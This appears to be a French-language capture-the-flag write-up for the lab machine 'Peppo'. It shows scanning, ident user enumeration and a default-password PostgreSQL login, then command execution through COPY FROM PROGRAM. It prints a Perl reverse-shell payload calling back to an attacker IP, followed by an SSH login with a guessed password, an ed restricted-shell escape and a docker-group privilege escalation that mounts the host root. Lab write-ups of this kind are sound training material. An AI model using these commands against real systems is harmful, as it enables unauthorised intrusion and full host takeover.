# Peppo

`postgresql` `rshell` `restricted shells` `docker`

* Nom machine : Peppo
* Difficulté : Difficile
* OS : Linux

## Enumération

### NMAP

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-18 08:12 EDT
Nmap scan report for 192.168.233.60
Host is up (0.035s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT      STATE  SERVICE           VERSION
22/tcp    open   ssh               OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey: 
|   2048 75:4c:02:01:fa:1e:9f:cc:e4:7b:52:fe:ba:36:85:a9 (RSA)
|   256 b7:6f:9c:2b:bf:fb:04:62:f4:18:c9:38:f4:3d:6b:2b (ECDSA)
|_  256 98:7f:b6:40:ce:bb:b5:57:d5:d1:3c:65:72:74:87:c3 (ED25519)
|_auth-owners: root
53/tcp    closed domain
113/tcp   open   ident             FreeBSD identd
|_auth-owners: nobody
5432/tcp  open   postgresql        PostgreSQL DB 12.3 - 12.4
8080/tcp  open   http              WEBrick httpd 1.4.2 (Ruby 2.6.6 (2020-03-31))
|_http-title: Redmine
| http-robots.txt: 4 disallowed entries 
|_/issues/gantt /issues/calendar /activity /search
|_http-server-header: WEBrick/1.4.2 (Ruby/2.6.6/2020-03-31)
10000/tcp open   snet-sensor-mgmt?
|_auth-owners: eleanor
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe: 
|     HTTP/1.1 400 Bad Request
|     Connection: close
|   FourOhFourRequest: 
|     HTTP/1.1 200 OK
|     Content-Type: text/plain
|     Date: Sun, 18 Aug 2024 12:15:10 GMT
|     Connection: close
|     Hello World
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 200 OK
|     Content-Type: text/plain
|     Date: Sun, 18 Aug 2024 12:15:04 GMT
|     Connection: close
|_    Hello World
```

### HTTP (8080)

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FTY5RPyZBLGNPi6SzH6UP%2F9baab028bec941588f21340f5df75e3f.png?alt=media&#x26;token=2a530612-3ace-42db-80d9-e56778de3896" alt=""><figcaption></figcaption></figure>

Redmine ?

Possibile de créer un compte mais l'administrator doit le valider. La recherche de répertoire ne mène à rien d'intéressant.

### ident (113) : FreeBSD identd

Le script nmap a déjà permis d'énumérer mais nous allons reproduire cette commande :

```
┌──(kali㉿kali)-[~]
└─$ ident-user-enum 192.168.233.60 22 53 113 5432 8080 10000
ident-user-enum v1.0 ( http://pentestmonkey.net/tools/ident-user-enum )

192.168.233.60:22	root
192.168.233.60:53	<unknown>
192.168.233.60:113	nobody
192.168.233.60:5432	<unknown>
192.168.233.60:8080	<unknown>
192.168.233.60:10000	eleanor
```

### Postgresql (5432) : PostgreSQL DB 12.3 - 12.4

{% embed url="<https://book.hacktricks.xyz/network-services-pentesting/pentesting-postgresql>" %}

```
┌──(kali㉿kali)-[~]
└─$ psql -h 192.168.233.60 -U postgres            
Password for user postgres:          #postgres
```

```
postgres=# \list
                                                      List of databases
   Name    |  Owner   | Encoding | Locale Provider |  Collate   |   Ctype    | ICU Locale | ICU Rules |   Access privileges   
-----------+----------+----------+-----------------+------------+------------+------------+-----------+-----------------------
 postgres  | postgres | UTF8     | libc            | en_US.utf8 | en_US.utf8 |            |           | 
 template0 | postgres | UTF8     | libc            | en_US.utf8 | en_US.utf8 |            |           | =c/postgres          +
           |          |          |                 |            |            |            |           | postgres=CTc/postgres
 template1 | postgres | UTF8     | libc            | en_US.utf8 | en_US.utf8 |            |           | =c/postgres          +
           |          |          |                 |            |            |            |           | postgres=CTc/postgres
(3 rows)
```

```
postgres=# \du+

 Role name |                         Attributes                         | Description 
-----------+------------------------------------------------------------+-------------
 postgres  | Superuser, Create role, Create DB, Replication, Bypass RLS | 

```

#### Lire fichier

{% embed url="<https://book.hacktricks.xyz/network-services-pentesting/pentesting-postgresql#read-directories-and-files>" %}

Nous allons tester de lire les fichier du server.

```
postgres=# CREATE TABLE demo(t text);
CREATE TABLE
postgres=# COPY demo from '/etc/passwd';
COPY 20
postgres=# SELECT * FROM demo;

 root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
 bin:x:2:2:bin:/bin:/usr/sbin/nologin
 sys:x:3:3:sys:/dev:/usr/sbin/nologin
 sync:x:4:65534:sync:/bin:/bin/sync
 games:x:5:60:games:/usr/games:/usr/sbin/nologin
 man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
 lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
 mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
 news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
 uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
 proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
 www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
 backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
 list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
 irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
 gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
 _apt:x:100:65534::/nonexistent:/usr/sbin/nologin
 postgres:x:999:999::/var/lib/postgresql:/bin/bash
```

## Accès initial

### RCE

```
postgres=# CREATE TABLE cmd_exec(cmd_output text);
CREATE TABLE
postgres=# COPY cmd_exec FROM PROGRAM 'id';
COPY 1
postgres=# SELECT * FROM cmd_exec;

                               cmd_output                               
------------------------------------------------------------------------
 uid=999(postgres) gid=999(postgres) groups=999(postgres),101(ssl-cert)

```

```
postgres=# COPY cmd_exec FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.45.176:8080");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;''';
COPY 0
```

```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 8080
listening on [any] 8080 ...
connect to [192.168.45.176] from (UNKNOWN) [192.168.233.60] 52196
whoami
postgres
```

Nous sommes ensuite bloqués, nous sommes dans un conteneur docker et pas moyen d'en ressortir.... Nous décidons donc de nous replonger dans nos notes, et nous nous rappelons que nous avons le nom d'un user grâce au service ident : eleanor

Evidemment, le mot de passe est identique à l'identifiant...

```
┌──(kali㉿kali)-[~]
└─$ ssh eleanor@192.168.233.60

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
eleanor@peppo:~$ 
```

Nous sommes dans un shell restreints, nous devons trouver quel commande nous pouvons utiliser dans ce shell pour pouvoir l'exploiter.

```
eleanor@peppo:~$ echo $PATH
/home/eleanor/bin
eleanor@peppo:~$ ls /home/eleanor/bin
chmod  chown  ed  ls  mv  ping	sleep  touch
```

Nous recherchons via GFTObins quel commande peut permettre d'obtenir un shell et nous trouvons ed.

{% embed url="<https://gtfobins.github.io/gtfobins/ed/#shell>" %}

Nous devons ensuite changer le PATH

```
eleanor@peppo:~$ ed
!/bin/bash
eleanor@peppo:~$ ls
bin  helloworld  local.txt
eleanor@peppo:~$ cat local.txt
bash: cat: command not found
eleanor@peppo:~$ whoami
bash: whoami: command not found
eleanor@peppo:~$ echo $PATH
/home/eleanor/bin
eleanor@peppo:~$ export PATH=/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin/:$PATH
eleanor@peppo:~$ echo $PATH
/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin/:/home/eleanor/bin
```

## Elévation des privilèges

```
eleanor@peppo:/tmp$ id
uid=1000(eleanor) gid=1000(eleanor) groups=1000(eleanor),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),999(docker)
```

Le groupe docker est exploitable

Nous allons télécharger une image docker sur notre machine pour ensuite la transférer sur la cible.

```
┌──(kali㉿kali)-[/home/kali]
└─# docker pull ubuntu
Using default tag: latest
latest: Pulling from library/ubuntu
Digest: sha256:8a37d68f4f73ebf3d4efafbcf66379bf3728902a8038616808f04e34a9ab63ee
Status: Downloaded newer image for ubuntu:latest
docker.io/library/ubuntu:latest
                                                                         
┌──(kali㉿kali)-[/home/kali]
└─# docker save -o ubuntu.tar ubuntu
```

Nous lançons un server python sur le port 10000.

```
┌──(kali㉿kali)-[~]
└─$ python -m http.server 10000
Serving HTTP on 0.0.0.0 port 10000 (http://0.0.0.0:10000/) ...
192.168.233.60 - - [18/Aug/2024 11:13:59] "GET /ubuntu.tar HTTP/1.1" 200
```

```
eleanor@peppo:/tmp$ wget http://192.168.45.176:10000/ubuntu.tar
--2024-08-18 11:14:00--  http://192.168.45.176:10000/ubuntu.tar
Connecting to 192.168.45.176:10000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 80569856 (77M) [application/x-tar]
Saving to: ‘ubuntu.tar’

ubuntu.tar     100%  76.84M  5.45MB/s    in 14s         

2024-08-18 11:14:15 (5.31 MB/s) - ‘ubuntu.tar’ saved [80569856/80569856]

eleanor@peppo:/tmp$ docker load -i ubuntu.tar
f36fd4bb7334: Loading layer  80.56MB/80.56MB
Loaded image: ubuntu:latest
eleanor@peppo:/tmp$ docker run -v /:/mnt -it ubuntu chroot /mnt
```

Nous avons maintenant accès à tous les fichiers. Nous pouvions également directement utiliser les images précédentes dans la machine avec `docker run -v /:/mnt --rm -it redmine chroot /mnt sh`

Nous pouvons ainsi récupérer le flag, ou bien tenter de cracker le fichier shadow